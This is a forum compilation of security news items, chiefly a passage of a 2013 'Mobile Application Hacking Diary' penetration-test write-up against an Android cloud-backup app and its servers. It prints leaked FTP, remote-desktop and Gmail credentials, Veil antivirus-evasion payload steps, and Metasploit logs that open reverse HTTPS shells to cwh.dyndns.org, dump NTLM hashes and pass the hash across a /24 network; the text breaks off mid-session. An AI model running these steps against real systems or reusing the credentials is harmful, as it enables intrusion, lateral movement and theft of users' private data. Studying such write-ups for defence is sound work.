Furthermore, I knew it was a software problem rather than something specific to one hardware configuration, as I accidentally encountered the bug on three different Windows 7 and 8 machines I use for my daily work. Following a brief analysis, it turned out I was not able to reproduce the issue using any background window other than vim. While I started considering if this could be a bug in vim itself, I tested several more windows (moving the mouse manually for a minute or two) and finally found that the Notepad worked equally well in the role of a background. Not a vim bug, hurray! 
As both windows share the same cursor shape while in edit mode – the I-beam, I concluded the bug must have been specific to switching from this specific shape to some other one. Precisely, while hovering the mouse over two windows and a boundary, the cursor switches from I-beam () to a horizontal resize () and later to a normal arrow (). Relying on the assumption that the bug is a race condition (or least timing related, as the problem only manifested while performing rapid mouse movements), I wrote the following proof of concept code to reproduce the problem in a more reliable manner (full source code here): LRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wparam, LPARAM lparam) { CONST UINT kTimerId = 1337; CONST UINT kIterations = 100; static HCURSOR cursor[3]; switch(msg) { case WM_CREATE: // Load cursors. cursor[0] = LoadCursor(NULL, IDC_IBEAM); cursor[1] = LoadCursor(NULL, IDC_SIZEWE); cursor[2] = LoadCursor(NULL, IDC_ARROW); // Set up initial timer. SetTimer(hwnd, kTimerId, 1, NULL); break; case WM_TIMER: // Rapidly change cursors. for (UINT i = 0; i < kIterations; i++) { SetCursor(cursor[0]); SetCursor(cursor[1]); SetCursor(cursor[2]); } // Re-set timer. SetTimer(hwnd, kTimerId, 1, NULL); break; [...] Articol complet: http://j00ru.vexillium.org/?p=1980
20. MAC Address Scanner

MAC Address Scanner is a free desktop tool to remotely scan and find the MAC address of all systems on your local network. It allows you to scan either a single host or a range of hosts at a time. During the scan, it displays the current status for each host. After completion, you can generate a detailed scan report in HTML/XML/TEXT format. Note that you can find the MAC address only for systems within your subnet; for all others, you will see the MAC address of the gateway or router. Being a GUI based tool makes it very easy to use for all levels of users, including beginners. It is fully portable and works on all platforms from Windows XP to Windows 8.

Features
- Quickly find the MAC address of all systems on the network
- Scan single or multiple systems
- Ability to stop the scanning operation at any time
- Color based representation for successful and failed hosts
- Save the scan report to HTML/XML/TEXT file
- Free and easy to use tool with cool GUI interface
- Fully portable and can be run on any Windows system
- Support for local installation & un-installation

Screenshots
Screenshot 1: MAC Address Scanner scanning the hosts and showing the discovered MAC addresses in blue color.
Screenshot 2: HTML based MAC address scan report generated by MAC Address Scanner.

Release History
Version 1.0 : 7th July 2013 - First public release of MAC Address Scanner

Download
FREE Download MAC Address Scanner v1.0
License : Freeware
Platform : Windows XP, 2003, Vista, Windows 7, Windows 8

Sursa: MAC Address Scanner : Desktop Tool to Find MAC address of Remote Computers on Local Network | www.SecurityXploded.com
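A short aside on the subnet limitation mentioned above: MAC addresses are a link-layer property, so they never cross a router, which is why anything outside your own subnet shows up with the gateway's MAC instead (tools like this presumably read the local IP-to-MAC mappings that ARP maintains). You can inspect the same mappings yourself with the built-in Windows command:

arp -a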
21. Arachni v0.4.3 has been released (Open Source Web Application Security Scanner Framework)

From: Tasos Laskos <tasos.laskos () gmail com>
Date: Sat, 06 Jul 2013 21:59:02 +0300

Hey folks, There's a new version of Arachni, an Open Source, modular and high-performance Web Application Security Scanner Framework written in Ruby. The change-log is quite sizeable but some bullet points follow.

For the Framework (v0.4.3):
* Stable multi-Instance scans, taking advantage of SMP/Grid architectures for higher efficiency and performance.
* Automated Grid load-balancing.
* Platform fingerprinting for tailor-made audits resulting in less bandwidth consumption, less server stress and smaller scan runtimes.

For the Web User Interface (v0.4.1):
* Support for PostgreSQL.
* Support for importing data and configuration from the previous 0.4.2-0.4 packages.

Packages:
* Downgraded to require GLIBC >= 2.12 for improved portability.

For more details about the new release please visit: Version 0.4.3 is out - Arachni - Web Application Security Scanner Framework
Download page: Download - Arachni - Web Application Security Scanner Framework
Homepage - Home - Arachni - Web Application Security Scanner Framework
Blog - Arachni - Web Application Security Scanner Framework - Web Application Security Scanner Framework
Documentation - https://github.com/Arachni/arachni/wiki
Support - Welcome - Arachni Support
GitHub page - http://github.com/Arachni/arachni
Code Documentation - Documentation for Arachni/arachni (master)
Author - Tasos "Zapotek" Laskos (http://twitter.com/Zap0tek)
Twitter - http://twitter.com/ArachniScanner
Copyright - 2010-2013 Tasos Laskos
License - Apache License v2

Cheers, Tasos Laskos.

Sursa: WebApp Sec: Arachni v0.4.3 has been released (Open Source Web Application Security Scanner Framework)
22. [h=1]Mobile Application Hacking Diary Ep.1[/h]

Mobile Application Hacking Diary Ep.1

|=--------------------------------------------------------------------=|
|=------------=[ Mobile Application Hacking Diary Ep.1]=--------------=|
|=--------------------------=[ 3 July 2013 ]=-------------------------=|
|=----------------------=[ By CWH Underground ]=--------------------=|
|=--------------------------------------------------------------------=|

###### Info ######

Title : Mobile Application Hacking Diary Ep.1
Author : ZeQ3uL and diF
Team : CWH Underground
Date : 2013-07-03

########## Contents ##########

[0x00] - Introduction
[0x01] - Application Reconnaissance
    [0x01a] - Insecure Data Storage
    [0x01b] - Decompile Application Package
[0x02] - Man in the Middle Attack
    [0x02a] - Preparation Tools
    [0x02b] - MitM Attack
[0x03] - Server-Side Attack
    [0x03a] - Scanning
    [0x03b] - Gaining Access
    [0x03c] - Bypass Anti-Virus
    [0x03d] - PWNed System !!
    [0x03e] - It's Not Over !!
[0x04] - Greetz To

#######################
[0x00] - Introduction
#######################

During the past few years, we've seen mobile devices evolve from simple, rather dumb phones to complete, integrated communication devices. As these devices became more intelligent ("smart" phones) and data transfer speeds on mobile networks increased significantly, people no longer used them solely for making phone calls or sending text messages, but started using them for sending email, browsing the Internet, playing games, checking in for flights, or doing online banking transactions. Companies started creating mobile applications to offer all sorts of services to their clients. Today, mobile applications are available for storing and synchronizing data files in the cloud, participating in social network sites, or even playing with a talking crazy frog. As the data that is stored, processed, and transferred by these applications can often be considered sensitive, it is important to ensure that the security controls on these mobile devices and applications are effective.

--SANS Penetration Testing Blog

This paper is the narrative and the explanation of our penetration testing techniques from the real world, as a case study of an Android application test. (Android is a Linux-based platform developed by Google and the Open Handset Alliance. Application programming for it is done exclusively in Java. The Android operating system software stack consists of Java applications running on a Dalvik virtual machine (DVM).) The main functions of this application work similarly to the famous Apple iCloud: backing up pictures, videos and contacts and syncing them to a personal cloud system.

Let's Begin! 
#####################################
[0x01] - Application Reconnaissance
#####################################

"Usually, a client software package is installed locally on the mobile device which acts as the front-end for the user. Packages are typically downloaded from an app store or market, or provided via the company's website. Similar to non-mobile software, these applications can contain a myriad of vulnerabilities. It is important to note that most testing on the client device usually requires a device that is rooted or jailbroken. For example, the authentic mobile OS will most likely prevent you from having access to all files and folders on the local file system. Furthermore, as software packages can often be decompiled, tampered with or reverse engineered, you may want to use a device that does not pose any restrictions on the software that you can install."

--SANS Penetration Testing Blog

Our first mission is Application Reconnaissance. The objective of this mission is to understand how the application works, to enumerate sensitive information from data kept in local storage and, to dig out even more information, to decompile the application package into a form of source code.

+++++++++++++++++++++++++++++++++
[0x01a] - Insecure Data Storage
+++++++++++++++++++++++++++++++++

We started our first mission by creating an Android pentest platform (installing the Android SDK, the Android Emulator and the Burp Suite proxy) and getting ready to connect to our phone using the Android Debug Bridge (http://developer.android.com/tools/help/adb.html). ADB is a versatile command line tool that lets you communicate with an emulator instance or a connected Android-powered device.

First, we signed up and logged in to the application, then used ADB to connect to the phone in debug mode with the "adb devices" command.

---------------------------------------------------------------
[zeq3ul@12:03:51]-[~]> adb devices
* daemon not running. starting it now *
* daemon started successfully *
List of devices attached
3563772CF3BC00FH    device
---------------------------------------------------------------

"adb shell" is the command we used to connect to the phone and explore its internal directories. Before any further exploration, we need to identify the real name of the application package, which is usually found as an ".apk" under the "/data/app/" folder. "/data/app/com.silentm.msec-v12.apk" was found to be the package of our target application, so "com.silentm.msec-v12" is the real name of the package. Finally, the folder belonging to the application under "/data/data" is the most likely place where sensitive information of the application is stored locally. As expected, we found crucial information stored in "/data/data/com.silentm.msec-v12/shared_prefs", as below.
---------------------------------------------------------------
[zeq3ul@12:05:24]-[~]> adb shell
# cd /data/data/com.silentm.msec-v12/shared_prefs
# cat PREFS.xml
<?xml version='1.0' encoding='utf-8' standalone='yes'?>
<map>
<string name="Last_added">9</string>
<boolean name="configured" value="true"/>
<string name="package">Trial</string>
<string name="version">1.2</string>
<string name="username">zeq3ul</string>
<string name="password">NXBsdXM0PTEw</string>
<string name="number">089383933283</string>
<string name="supportedextension">{&quot;D&quot;:&quot;HTML,XLS,XLSX,XML,TXT,DOC,DOCX,PPT,PDF,ISO,ZIP,RAR,RTF&quot;,&quot;M&quot;:&quot;MP3,MP2,WMA,AMR,WAV,OGG,MMF,AC3&quot;,&quot;I&quot;:&quot;JPEG,JPG,GIF,BMP,PNG,TIFF&quot;,&quot;V&quot;:&quot;3GP,MP4,MPEG,WMA,MOV,FLV,MKV,MPEG4,AVI,DivX&quot;}</string>
...
</map>
---------------------------------------------------------------

We found our username and password stored locally in PREFS.xml. The password appears to be protected by some kind of encryption, but if you take a good look at it you will find it is only a Base64-encoded string, so it can easily be decoded to reveal the real password:

"NXBsdXM0PTEw" > "5plus4=10"

TIPS! This is a bad example of how applications store sensitive data, and encoding a password with Base64 (Encode != Encrypt) is an equally bad idea. The offending code is shown below:

---------------------------------------------------------------
public void saveCredentials(String userName, String password)
{
    SharedPreferences PREFS;
    PREFS = getSharedPreferences(MYPREFS, Activity.MODE_PRIVATE);
    SharedPreferences.Editor editor = PREFS.edit();
    String mypassword = password;
    // Base64 is an encoding, not encryption -- trivially reversible
    String base64password = new String(Base64.encodeToString(mypassword.getBytes(), 4));
    editor.putString("Username", userName);
    editor.putString("Password", base64password);
    editor.commit();
}
---------------------------------------------------------------

+++++++++++++++++++++++++++++++++++++++++
[0x01b] - Decompile Application Package
+++++++++++++++++++++++++++++++++++++++++

Next, in order to completely understand the mechanism of the application, we need to obtain its source code. For an Android application, this can be done by decompiling the Android package (".apk"). Android packages (".apk" files) are actually simply ZIP files. They contain the AndroidManifest.xml, classes.dex and resources.arsc, among other components. You can rename the extension and open the file with a ZIP utility such as WinZip to view its contents.

We started with the "adb pull" command to extract the Android application from the mobile phone.

---------------------------------------------------------------
[zeq3ul@12:08:37]-[~]> adb pull /data/app/com.silentm.msec-v12.apk
1872 KB/s (5489772 bytes in 2.862s)
---------------------------------------------------------------

The next step is to decompile the ".apk" we just pulled using a tool called dex2jar (http://code.google.com/p/dex2jar/). dex2jar converts ".dex" files into human-readable Java ".class" files.

NOTICE! "classes.dex" is stored in every ".apk", as mentioned above. This can be verified by renaming any ".apk" to ".zip" and extracting it; you will then see the structure of an ".apk".

---------------------------------------------------------------
[zeq3ul@12:09:11]-[~]> bash dex2jar.sh com.silentm.msec-v12.apk
dex2jar version: translator-0.0.9.8
dex2jar com.silentm.msec-v12.apk -> com.silentm.msec-v12_dex2jar.jar
Done.
---------------------------------------------------------------
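As an aside (a minimal sketch added for illustration, not part of the original diary), both observations above can be reproduced with nothing but the standard Java library: java.util.Base64 reverses the "encrypted" password found in PREFS.xml, and java.util.zip.ZipFile confirms that the pulled ".apk" is just a ZIP archive containing classes.dex, AndroidManifest.xml and friends. The class name and the file path are assumptions based on the "adb pull" output above.

---------------------------------------------------------------
import java.nio.charset.StandardCharsets;
import java.util.Base64;
import java.util.Collections;
import java.util.zip.ZipEntry;
import java.util.zip.ZipFile;

public class ReconCheck {
    public static void main(String[] args) throws Exception {
        // 1) "Encode != Encrypt": recover the password stored in PREFS.xml
        byte[] raw = Base64.getDecoder().decode("NXBsdXM0PTEw");
        System.out.println("Decoded password: " + new String(raw, StandardCharsets.UTF_8)); // prints 5plus4=10

        // 2) An .apk is just a ZIP: list its entries (classes.dex, AndroidManifest.xml, ...)
        // The path is an assumption -- adjust it to wherever "adb pull" dropped the package.
        try (ZipFile apk = new ZipFile("com.silentm.msec-v12.apk")) {
            for (ZipEntry entry : Collections.list(apk.entries())) {
                System.out.println(entry.getName());
            }
        }
    }
}
---------------------------------------------------------------

Nothing beyond standard library calls is needed to defeat this kind of "protection", which is exactly the point of the TIPS above.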
JD-GUI (http://java.decompiler.free.fr/?q=jdgui) is our tool of choice for reading the decompiled source (the ".jar" produced by dex2jar), in this case "com.silentm.msec-v12_dex2jar.jar".

NOTE: JD-GUI is a standalone graphical utility that displays the Java source code of ".class" files. You can browse the reconstructed source code with JD-GUI for instant access to methods and fields.

As a result, we found that "Config.class" holds some smelly, hard-coded information in the source, as shown below:

Config.class
---------------------------------------------------------------
package com.silentm.msec;

public class Config
{
    public static final String CONTACT_URL = "http://203.60.240.180/en/Contact.aspx";
    public static final String Check_Memory = "http://203.60.240.180/en/CheckMem.aspx";
    public static final String BackupSMS = "http://203.60.240.180/en/backupsms.aspx";
    public static final String Forgot_Password = "http://203.60.240.180/en/ForgotPassword.aspx";
    public static final String FTP_URL = "203.60.240.183";
    public static final String FTP_User = "msec1s";
    public static final String FTP_Password = "S1lentM!@#$ec";
    public static final String Profile = "http://203.60.240.180/en/Profile.aspx";
    public static final int MAX_MEMORY = 500;
    public static final int LOG_COUNT = 30;
    ...
}
---------------------------------------------------------------

Explain!! The backup URLs and the FTP user and password were found in the source code (W00T W00T !!). Now we know that this application uses the FTP protocol to transfer pictures, SMS and contact information to the cloud server, and that SUCKS!! because the credentials are hard-coded and FTP is not a secure protocol.

###################################
[0x02] - Man in the Middle Attack
###################################

"The second attack surface is the communications channel between the client and the server. Although applications use more and more secured communications for sending sensitive data, this is not always the case. In your testing infrastructure, you will want to include an HTTP manipulation proxy to intercept and alter traffic. If the application does not use the HTTP protocol for its communication, you can use a transparent TCP and UDP proxy like the Mallory tool. By using a proxy, you can intercept, analyze, and modify data that is communicated between the client and the server."

--SANS Penetration Testing Blog

As we found that our target application uses the HTTP protocol, the next step is to set up an HTTP intercepting proxy tool such as ZAP Proxy or Burp Suite (Burp Suite was chosen this time) in order to perform our second mission, a Man in the Middle attack against the application. Having a web proxy intercepting requests is a key piece of the puzzle; from this point forward, our test uses techniques similar to regular web application testing.

We intercepted every HTTP request and response of the application with the Burp Suite proxy (http://www.portswigger.net/burp/). In the HTTP request we found sensitive information (username and password) sent to the server side: because the application uses plain HTTP, the login packet travels in clear text, and anyone in the middle of this communication sees the credentials crystal clear (what a kind app!). The intercepted request and response are shown below.
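Before the captures, a hedged illustration of why this matters (a sketch added for this write-up, not something from the original assessment): because the login travels over plain HTTP, anyone on the path who records the request can replay it with a few lines of standard Java. The endpoint, parameter names and values are taken from the captured request that follows; the class name is made up for the example.

---------------------------------------------------------------
import java.io.OutputStream;
import java.net.HttpURLConnection;
import java.net.URL;
import java.nio.charset.StandardCharsets;
import java.util.Scanner;

public class ReplayLogin {
    public static void main(String[] args) throws Exception {
        // Same form body as the intercepted request (values copied from the capture below)
        String body = "imei=352489051163052&username=zeq3ul&password=5plus4=10";

        HttpURLConnection conn = (HttpURLConnection)
                new URL("http://203.60.240.180/en/GetInfo.aspx").openConnection();
        conn.setRequestMethod("POST");
        conn.setDoOutput(true);
        conn.setRequestProperty("Content-Type", "application/x-www-form-urlencoded");

        // The credentials leave the box unencrypted, exactly as in the original app
        try (OutputStream out = conn.getOutputStream()) {
            out.write(body.getBytes(StandardCharsets.UTF_8));
        }

        // Dump whatever the server answers (the real response leaked admin mail credentials)
        try (Scanner in = new Scanner(conn.getInputStream(), StandardCharsets.UTF_8.name())) {
            while (in.hasNextLine()) {
                System.out.println(in.nextLine());
            }
        }
    }
}
---------------------------------------------------------------

HttpURLConnection is used here only because it needs no third-party dependency; any HTTP client would do, which is precisely the problem with an unencrypted login endpoint.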
Burpsuite: HTTP Request
---------------------------------------------------------------
POST http://203.60.240.180/en/GetInfo.aspx HTTP/1.1
Content-Length: 56
Content-Type: application/x-www-form-urlencoded
Host: 203.60.240.180
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

imei=352489051163052&username=zeq3ul&password=5plus4=10
---------------------------------------------------------------

Moreover, the HTTP response surprised us even more: someone's Gmail address and password (we found out later that it belonged to an administrator) appeared right in front of our eyes!

Burpsuite: HTTP Response
---------------------------------------------------------------
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 07 June 2013 12:15:37 GMT
Content-Length: 2405

{"AppVersion":"1.2","FTP_USER":"msec1s","FTP_PASS":"S1lentM!@#$ec","FTP_SERVER":"203.60.240.183","MAX_MEMORY":"500","LOG_COUNT":"30",
"Smtp":"smtp.gmail.com","FromEmail":"mseccloud@gmail.com","FromEmailPwd":"M[Sec)0/",................
---------------------------------------------------------------

As a result, we were able to sniff the username and password in clear text (no SSL, no encryption) and to compromise the administrator's email account, using the address "mseccloud@gmail.com" and the password "M[Sec)0/" that the server handed us for free in its HTTP response. :\

#############################
[0x03] - Server-Side Attack
#############################

"In most cases, the server to which the client communicates is one or more web servers. The attack vectors for the web servers behind a mobile application is similar to those we use for regular web sites. Aside from looking for vulnerabilities in the web application, you should also perform host and service scans on the target system(s) to identify running services, followed by a vulnerability scan to identify potential vulnerabilities, provided that such testing is allowed within the scope of the assignment."

--SANS Penetration Testing Blog

++++++++++++++++++++
[0x03a] - Scanning
++++++++++++++++++++

As we found the backend addresses (203.60.240.180 and 203.60.240.183) in the source code, we need to check the security of the backend systems as well. We started by scanning the targets for open ports using nmap (http://nmap.org).

Nmap Result for 203.60.240.180
---------------------------------------------------------------
[zeq3ul@12:30:54]-[~]> nmap -sV -PN 203.60.240.180

Starting Nmap 6.00 ( http://nmap.org ) at 2013-06-07 12:31 ICT
Nmap scan report for 203.60.240.180
Host is up (0.0047s latency).
Not shown: 998 filtered ports
PORT     STATE SERVICE        VERSION
80/tcp   open  http           Microsoft IIS httpd 7.0
443/tcp  open  ssl/http       Microsoft IIS httpd 7.0
3389/tcp open  ms-wbt-server?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.99 seconds
---------------------------------------------------------------

Nmap Result for 203.60.240.183
---------------------------------------------------------------
[zeq3ul@12:35:12]-[~]> nmap -sV -PN 203.60.240.183

Starting Nmap 6.00 ( http://nmap.org ) at 2013-06-07 12:35 ICT
Nmap scan report for 203.60.240.183
Host is up (0.0036s latency).
Not shown: 997 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.38 seconds
---------------------------------------------------------------

From the scan results we got a list of open ports: IIS and Terminal Services running on 203.60.240.180, and FTP running on 203.60.240.183. It's time to grab the low-hanging fruit.

++++++++++++++++++++++++++
[0x03b] - Gaining Access
++++++++++++++++++++++++++

As we found the FTP username and password in the source code ("msec1s" / "S1lentM!@#$ec"), we were able to access the FTP service running on the server, as shown below:

FTP Server: 203.60.240.183
---------------------------------------------------------------
[zeq3ul@12:40:12]-[~]> ftp 203.60.240.183
Connected to 203.60.240.183
220 Microsoft FTP Service
User <203.60.240.183:<none>>: msec1s
331 Password required
Password:
230 User logged in.
ftp> pwd
257 "/" is current directory.
ftp>
---------------------------------------------------------------

Having compromised the FTP server with the "msec1s" account, we were able to access all customer contacts, pictures, videos, etc. Excitedly, we expected to find some "INTERESTING" pictures or video clips; BUT we found DICK! WTF!! So we got a shock and stopped searching. OTL

Moving to our next target, 203.60.240.180, we tried to access it via Terminal Services. Luckily, we were able to get into the server using the same username and password as on the FTP server ("msec1s" / "S1lentM!@#$ec"). Yummy!

Remote Desktop with rdesktop
---------------------------------------------------------------
[zeq3ul@12:56:04]-[~]> rdesktop -u msec1s -p S1lentM!@#$ec 203.60.240.180
---------------------------------------------------------------

Moreover, the "msec1s" account was in the administrators group. OWNAGED!

+++++++++++++++++++++++++++++
[0x03c] - Bypass Anti-virus
+++++++++++++++++++++++++++++

Many anti-virus programs work by pattern or signature matching: if a program looks like malware, the AV will catch it. If a malicious file has a signature the AV does not know, the AV will most likely classify the file as clean and unharmed.

"Veil, a new payload generator created by security expert and Blackhat USA class instructor Chris Truncer, does just that." -- https://www.christophertruncer.com/veil-a-payload-generator-to-bypass-antivirus/

We simply pick a payload, use msfvenom shellcode and choose a reverse HTTPS connection back to our web server (cwh.dyndns.org) with the following choices:

---------------------------------------------------------------
========================================================================
 Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013
========================================================================

 [?] Use msfvenom or supply custom shellcode?

     1 - msfvenom (default)
     2 - Custom

 [>] Please enter the number of your choice: 1

 [?] What type of payload would you like?
     1 - Reverse TCP
     2 - Reverse HTTP
     3 - Reverse HTTPS
     0 - Main Menu

 [>] Please enter the number of your choice: 3
 [?] What's the Local Host IP Address: cwh.dyndns.org
 [?] What's the Local Port Number: 443
---------------------------------------------------------------

Now we have a payload.exe file. When any Windows system executes this .exe, it will immediately try to connect back to our server.

+++++++++++++++++++++++++++
[0x03d] - PWNED System !!
+++++++++++++++++++++++++++

Time to PWN! As the target server (203.60.240.180) can be accessed via the MSRDP service (port 3389) and has access to the Internet, we can simply run a web server on our machine, remote into the target (via MSRDP), download our payload (payload.exe) and execute it there. The executed Metasploit payload connects a Meterpreter session back (reverse_https) to our server (cwh.dyndns.org).

After that we wanted to use hashdump to dump the LM/NTLM hashes on the server, but this cannot be done right away: on an x64 box, if Meterpreter is not running inside an x64 process, hashdump fails, complaining that it does not have the correct version offsets (the system is x64 while Meterpreter is x86/win32). So we need to find a good process to migrate into and work from there; in this case we migrated into the Winlogon process, which runs as x64. Our console log looks like this:

---------------------------------------------------------------
[zeq3ul@13:16:14]-[~]> sudo msfconsole
[sudo] password for zeq3ul:

[Metasploit "Matrix" ASCII art banner omitted]

       http://metasploit.pro

       =[ metasploit v4.6.2-1 [core:4.6 api:1.0]
+ -- --=[ 1113 exploits - 701 auxiliary - 192 post
+ -- --=[ 300 payloads - 29 encoders - 8 nops

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > set LHOST cwh.dyndns.org
LHOST => cwh.dyndns.org
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started HTTPS reverse handler on https://cwh.dyndns.org:443/
msf exploit(handler) >
[*] Starting the payload handler...
[*] 203.60.240.180:49160 Request received for /oOTJ...
[*] 203.60.240.180:49160 Staging connection for target /oOTJ received...
[*] Patched user-agent at offset 640488...
[*] Patched transport at offset 640148...
[*] Patched URL at offset 640216...
[*] Patched Expiration Timeout at offset 640748...
[*] Patched Communication Timeout at offset 640752...
[*] Meterpreter session 1 opened (cwh.dyndns.org:443 -> 203.60.240.180:49160) at 2013-06-07 13:25:17 +0700

sessions -l

Active sessions
===============

  Id  Type                   Information                               Connection
  --  ----                   -----------                               ----------
  1   meterpreter x86/win32  WIN-UUOFVQRLB13\msec1s @ WIN-UUOFVQRLB13  cwh.dyndns.org:443 -> 203.60.240.180:49160 (203.60.240.180)

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : WIN-UUOFVQRLB13
OS              : Windows 2008 R2 (Build 7600).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Meterpreter     : x86/win32
meterpreter > ps -S winlogon
Filtering on process name...
Process List
============

 PID  PPID  Name          Arch    Session  User                 Path
 ---  ----  ----          ----    -------  ----                 ----
 384  340   winlogon.exe  x86_64  1        NT AUTHORITY\SYSTEM  C:\Windows\System32\winlogon.exe

meterpreter > migrate 384
[*] Migrating from 1096 to 384...
[*] Migration completed successfully.
meterpreter > sysinfo
Computer        : WIN-UUOFVQRLB13
OS              : Windows 2008 R2 (Build 7600).
Architecture    : x64
System Language : en_US
Meterpreter     : x64/win64
meterpreter > run hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY c6b1281c29c15b25cfa14495b66ea816...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
No users with password hints on this system
[*] Dumping password hashes...

Administrator:500:aad3b435b51404eeaad3b435b51404ee:de26cce0356891a4a020e7c4957afc72:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
msec1s:1000:aad3b435b51404eeaad3b435b51404ee:73778dadcbb3fbd800e5bb383d5ec1e3:::
---------------------------------------------------------------

Now we have the LM/NTLM hashes from our target (203.60.240.180).

++++++++++++++++++++++++++
[0x03e] - It's Not Over
++++++++++++++++++++++++++

Let's move on to our final mission.

In the common case, the next thing to do is to start cracking the hashes we got, for later use. There are many caveats to cracking Windows hashes and it does take some time, so you might as well begin that process ASAP, right? However, there is often no reason to spend time and cycles cracking hashes when you can "PASS THE HASH".

One of the most common ways to pass the hash is the PSEXEC module (exploit/windows/smb/psexec) in Metasploit. This module executes an arbitrary payload by authenticating to Windows SMB using administrative credentials (a password or a hash) and creating a Windows service. It is a pretty powerful module in most pen-test toolkits once you get to the point of dumping hashes on a Windows machine.

"Once you use it successfully it will become very apparent that this power could be multiplied by several orders of magnitude if someone wrote a scanning-capable version that accepts an RHOSTS option rather than a single RHOST. Apparently that's what Carlos Perez thought when he wrote psexec_scanner" -- http://www.darkoperator.com/blog/2011/12/16/psexec-scanner-auxiliary-module.html

---------------------------------------------------------------
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use auxiliary/scanner/smb/psexec_scanner
msf auxiliary(psexec_scanner) > show options

Module options (auxiliary/scanner/smb/psexec_scanner):

   Name       Current Setting                  Required  Description
   ----       ---------------                  --------  -----------
   HANDLER    true                             no        Start an Exploit Multi Handler to receive the connection
   LHOST                                       yes       Local Hosts for payload to connect.
   LPORT                                       yes       Local Port for payload to connect.
   OPTIONS                                     no        Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
   PAYLOAD    windows/meterpreter/reverse_tcp  yes       Payload to use against Windows host
   RHOSTS                                      yes       Range of hosts to scan.
   SHARE      ADMIN$                           yes       The share to connect to, can be an admin share (ADMIN$,C$,...)
                                                         or a normal read/write folder share
   SMBDomain  WORKGROUP                        yes       SMB Domain
   SMBPass                                     no        SMB Password
   SMBUser                                     no        SMB Username
   THREADS                                     yes       The number of concurrent threads
   TYPE       manual                           no        Type of credentials to use, manual for provided one, db for those found on the database (accepted: db, manual)

msf auxiliary(psexec_scanner) > set LHOST cwh.dyndns.org
LHOST => cwh.dyndns.org
msf auxiliary(psexec_scanner) > set LPORT 8443
LPORT => 8443
msf auxiliary(psexec_scanner) > set RHOSTS 203.60.240.0/24
RHOSTS => 203.60.240.0/24
msf auxiliary(psexec_scanner) > set SMBUser administrator
SMBUser => administrator
msf auxiliary(psexec_scanner) > set SMBPass aad3b435b51404eeaad3b435b51404ee:de26cce0356891a4a020e7c4957afc72
SMBPass => aad3b435b51404eeaad3b435b51404ee:de26cce0356891a4a020e7c4957afc72
msf auxiliary(psexec_scanner) > set THREADS 10
THREADS => 10
msf auxiliary(psexec_scanner) > exploit

[*] Using the username and password provided
[*] Starting exploit multi handler
[*] Started reverse handler on cwh.dyndns.org:8443
[*] Starting the payload handler...
[*] Scanned 031 of 256 hosts (012% complete)
[*] Scanned 052 of 256 hosts (020% complete)
[*] Scanned 077 of 256 hosts (030% complete)
[*] Scanned 111 of 256 hosts (043% complete)
[*] Scanned 129 of 256 hosts (050% complete)
[*] Scanned 154 of 256 hosts (060% complete)
[*] 203.60.240.165:445 - TCP OPEN
[*] Trying administrator:aad3b435b51404eeaad3b435b51404ee:de26cce0356891a4a020e7c4957afc72
[*] 203.60.240.180:445 - TCP OPEN
[*] Trying administrator:aad3b435b51404eeaad3b435b51404ee:de26cce0356891a4a020e7c4957afc72
[*] Connecting to the server...
[*] Authenticating to 203.60.240.165:445|WORKGROUP as user 'administrator'...
[*] Connecting to the server...
[*] Authenticating to 203.60.240.180:445|WORKGROUP as user 'administrator'...
[*] Uploading payload...
[*] Uploading payload...
[*] Created \ExigHylG.exe...
[*] Created \xMhdkXDt.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:203.60.240.180[\svcctl] ...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:203.60.240.165[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:203.60.240.180[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:203.60.240.165[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (ZHBMTKgE - "MgHtGamQQzIQxKDJsGWvcgiAStFttWMt")...
[*] Creating a new service (qJTBfPjT - "MhIpwSR")...
[*] Closing service handle...
[*] Closing service handle...
[*] Opening service...
[*] Opening service...
[*] Starting the service...
[*] Starting the service...
[*] Removing the service...
[*] Removing the service...
[*] Sending stage (751104 bytes) to 203.60.240.180
[*] Closing service handle...
[*] Closing service handle...
[*] Deleting \xMhdkXDt.exe...
[*] Deleting \ExigHylG.exe...
[*] Meterpreter session 2 opened (cwh.dyndns.org:8443 -> 203.60.240.180:49161) at 2013-07-02 13:40:42 +0700
[*] Sending stage (751104 bytes) to 203.60.240.165
[*] Meterpreter session 3 opened (cwh.dyndns.org:8443 -> 203.60.240.165:50181) at 2013-07-02 13:42:06 +0700
[*] Scanned 181 of 256 hosts (070% complete)
[*] Scanned 205 of 256 hosts (080% complete)
[*] Scanned 232 of 256 hosts (090% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

msf auxiliary(psexec_scanner) > sessions -l

